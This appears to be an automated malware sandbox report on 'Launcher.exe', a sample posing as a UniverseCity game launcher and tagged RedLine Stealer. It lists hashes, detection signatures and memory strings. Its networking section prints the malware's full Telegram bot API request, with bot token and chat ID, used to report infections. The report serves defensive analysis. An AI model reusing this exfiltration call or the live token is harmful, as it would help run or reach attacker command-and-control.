Windows Analysis Report
Launcher.exe

Overview

General Information

Sample Name: Launcher.exe
Analysis ID: 753414
MD5: ac30d9ee77f4a6e23dea621727579dc5
SHA1: 9dc851e691a4af49882138ee7c5bac1dc126becd
SHA256: d8f1870f30298302fce860d7c56257f6a11e4689642c3d5367d2392db5356bed
Tags: 185-206-213-32CosmicWayexeFakeGaliXCityRedLineStealerUniverseCity

Detection

Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Binary contains a suspicious time stamp
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Enables debug privileges

Classification

AV Detection

Source: Launcher.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: Launcher.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Dima\Desktop\Ogooo\CosmicWay\obj\Release\UniverseCity.pdb source: Launcher.exe
Source: Binary string: C:\Users\Dima\Desktop\Ogooo\CosmicWay\obj\Release\UniverseCity.pdb+G source: Launcher.exe

Networking

Source: unknown DNS query: name: api.telegram.org
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected: GET /bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage?chat_id=-1001729137879&text=5.0%20NEW%2020.11.2022%0A%E2%9C%85%D0%A3%D1%81%D0%BF%D0%B5%D1%88%D0%BD%D1%8B%D0%B9%20%D0%B7%D0%B0%D0%BF%D1%83%D1%81%D0%BA%20%D0%BB%D0%B0%D1%83%D0%BD%D1%87%D0%B5%D1%80%D0%B0:%20user%0A%D0%A1%D0%B0%D0%B9%D1%82:%20universecity%0A%D0%94%D0%B0%D1%82%D0%B0%2011/24/2022%207:35:59%20PM&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: Launcher.exe, 00000000.00000002.505090337.0000000002C24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: Launcher.exe, 00000000.00000002.508132544.0000000005AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.506057740.0000000002E88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://defaultcontainer/UniverseCity;component/Fonts/dosis.ttf
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://defaultcontainer/UniverseCity;component/Fonts/montserrat-variablefont_wght.ttf
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://defaultcontainer/UniverseCity;component/Images/img_downloadWhite.png
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/Fonts/dosis.ttf
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/Fonts/montserrat-variablefont_wght.ttf
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/Images/img_downloadWhite.png
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/bar/fonts/dosis.ttf
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/bar/fonts/montserrat-variablefont_wght.ttf
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/bar/images/img_downloadwhite.png
Source: Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Launcher.exe, 00000000.00000003.245277692.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.508004314.00000000059FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://scripts.sil.org/OFL
Source: Launcher.exe String found in binary or memory: http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLDosisExtraLightWeightLightMediumSemiBoldBoldExtr
Source: Launcher.exe String found in binary or memory: http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLMontserratThinMontserratRomanWeightExtraLightLig
Source: Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.impallari.com
Source: Launcher.exe String found in binary or memory: http://www.impallari.comThis
Source: Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zkysky.com.ar/
Source: Launcher.exe String found in binary or memory: http://www.zkysky.com.ar/This
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Launcher.exe String found in binary or memory: https://api.telegram.org/bot
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage
Source: Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage?chat_id=-1001
Source: Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/invite/universecity
Source: Launcher.exe String found in binary or memory: https://discord.com/invite/universecityGhttps://twitter.com/UniverseCityP2E3https://universe-city.io
Source: Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245316162.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245301155.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245327352.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/JulietaUla/Montserrat)
Source: Launcher.exe String found in binary or memory: https://github.com/JulietaUla/Montserrat)Montserrat
Source: Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/UniverseCityP2E
Source: Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://universe-city.io/
Source: Launcher.exe String found in binary or memory: https://universe-city.io/download/UniverseCity.zip
Source: unknown DNS traffic detected: queries for: api.telegram.org
Source: Launcher.exe, 00000000.00000000.239074629.0000000000706000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameUniverseCity.exe4 vs Launcher.exe
Source: Launcher.exe Binary or memory string: OriginalFilenameUniverseCity.exe4 vs Launcher.exe
Source: Launcher.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Launcher.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Launcher.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\Launcher.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Launcher.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}\InprocServer32
Source: classification engine Classification label: mal48.troj.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\Launcher.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Launcher.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Launcher.exe Static file information: File size 1126912 > 1048576
Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Launcher.exe Static PE information: 0xAAC8B1A6 [Sun Oct 17 22:56:38 2060 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.109491085129885
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Launcher.exe Window / User API: threadDelayed 1859
Source: Launcher.exe, 00000000.00000002.508111341.0000000005AD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Launcher.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Launcher.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\Desktop\Launcher.exe VolumeInformation
Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
Source: C:\Users\user\Desktop\Launcher.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid